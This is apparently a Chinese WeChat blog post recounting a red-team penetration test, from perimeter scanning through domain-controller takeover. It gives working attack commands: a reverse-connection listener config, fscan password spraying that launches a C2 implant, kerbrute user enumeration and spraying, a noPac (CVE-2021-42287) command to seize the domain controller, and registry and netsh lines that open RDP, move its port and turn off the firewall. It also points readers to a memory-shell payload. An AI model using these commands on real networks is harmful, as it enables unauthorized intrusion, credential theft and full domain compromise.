前言:
已经有好久没有发过文章了,最近也是比较闲,想着随便写一点,由于一些案例比较久,文章有些内容没有截图,只能去靠文字去描述一些方法
利用ez打点:
这里安利一下ez扫描器,个人感觉这款扫描器还是挺好用的,比如扫一些log4j2或者fastjson这种效果还是比较好的,这次比赛中有几个log4j2插件没扫出来,ez可以扫出来
配置反连地址:
https://docs.ezreal.cool/docs/EZUSE/ez-reverse
根据官方文档在vps的配置文件config.yaml中配置好相应的信息:
# 反连平台配置
reverse:
# 如 test123
token: nihao_shijie_001
# 如1.1.1.1:8080
http: 0.0.0.0:80
# 如 a.evildomain.com
dns: testlog.aaaaaaa.com
# 如 1.1.1.1:8082
rmi: 0.0.0.0:891
# 如 1.1.1.1:8083
ldap: 0.0.0.0:5555
vps运行:
./ez reverse
在自己机器上的confi.yaml文件中填好对应的反连信息,
可以用ez --check-reverse webscan
验证
如图,就是代表反连可以正常使用
主动扫描:
网上有个xray联动rad和crawlergo的一个python脚本
https://github.com/mrknow001/Crawlergo_x_Rad_x_XRAY
这里我们可以把它改一下,直接用于联动ez
配置好https://github.com/mrknow001/Crawlergo_x_Rad_x_XRAY/blob/main/launcher.py的路径
配置好Crawlergo,rad和ez路径,直接将url放进target.txt里面,运行该python脚本即可:
被动扫描:
ez的被动扫描还是能带来惊喜的
被动扫描插件的话我用的是这个:
https://github.com/winezer0/passive-scan-client-plus
可以支持高版本java运行,而且在流量这方面目前没有感觉到有啥问题
某naginx页面jeecgboot命令执行:
被动扫描获取到一个jeecgboot信息泄露:
这里我们就知道这个网站使用了jeecgboot框架:利用历史漏洞,直接收获一枚rce:
注入哥斯拉内存马:
公众号回复20240818获取内存马payload:
至此,拿下该nginx页面的网站:
某log4j2漏洞:
这个漏洞当时也是用ez直接出了,插件都没扫出来:
成功获取到系统权限:
利用魔改版jndi工具注入内存马获取权限:
内网:
内网的话大家打起来都比较粗暴,大部分都是fscan一把梭哈,拿着密码不断去碰撞,这里就不写怎么多了,简单描述一些方法
通过log4j2漏洞进入内网:
通过反编译源码,获取到数据库密码:
利用改密码进行密码喷洒,喷洒时执行上线c2命令,这里我选择上线vshell
这里也是推荐大家在扫描时,上线一下c2,防止在扫描过程中掉线而没来及做权限维持
fscan.exe -h ip段 -p service -c "c2命令"
这里上线了几台机器,便于做权限维持
利用密码碰撞拿到了oa的数据库,获取到了oa的账户和用户名,这为下一步打域控做了基础
利用Kerberos Pre-Authentication进行域内用户暴力破解:
工具:https://github.com/ropnop/kerbrute
在这之前已经通过mssql弱口令拿下了几台域用户机器,但是有一些杀软,不太好操作,因为从数据库中获取到了oa的账户密码,所以想着利用该方法进行暴力破解域用户密码:
暴力破解域用户:
将oa用户名作为一个字典:
kerbrute_windows_amd64.exe userenum --dc 1.1.1.1 -d attack.com .user.txt
然后将爆破出来的域用户作为字典,随便选取一个密码来进行暴力破解:
kerbrute_windows_amd64.exe passwordspray --dc 1.1.1.1 -d attack.com user.txt xx123456
爆破出来了一个域用户
利用cve2021-42287拿下域控:
proxychains python3 noPac.py attack.com/administrator:'xx123456' -dc-ip 1.1.1.1 -dc-host DC -dump --impersonate administrator
pth攻击拿下域控:
dump域内dns记录:
proxychains python3 dnsdump.py -u 'xxx.cnadministrator' -p xxxxx 1.1.1.1 -r
可以看到,这个域还是比较大的,2w多台机器
RDP登录域控:
这里有一个小技巧,也是很常见的一个问题,这里我登陆域控的时候,通过命令正常打开了远程桌面和关闭防火墙:
##打开rdp:
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
##关闭防火墙:
netsh advfirewall set allprofiles state off
这里通过命令查看,rdp端口确实为3389:
登陆的时候无法与rdp建立连接,端口扫描也无法探测到3389端口:
这个时候可能是该机器的rdp端口做了连接限制,我们将rdp端口进行修改就能正常登陆了:
#关闭RDP
REG ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000001 /f
#修改3389端口
reg add "HKEY_LOCAL_MACHINESystemCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v "PortNumber" /t REG_DWORD /d 33389 /f
#开启RDP
REG ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
#关闭防火墙
netsh advfirewall set allprofiles state off
netsh advfirewall show allprofiles
原文始发于微信公众号(安全小子大杂烩):ez突破边界到内网渗透
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论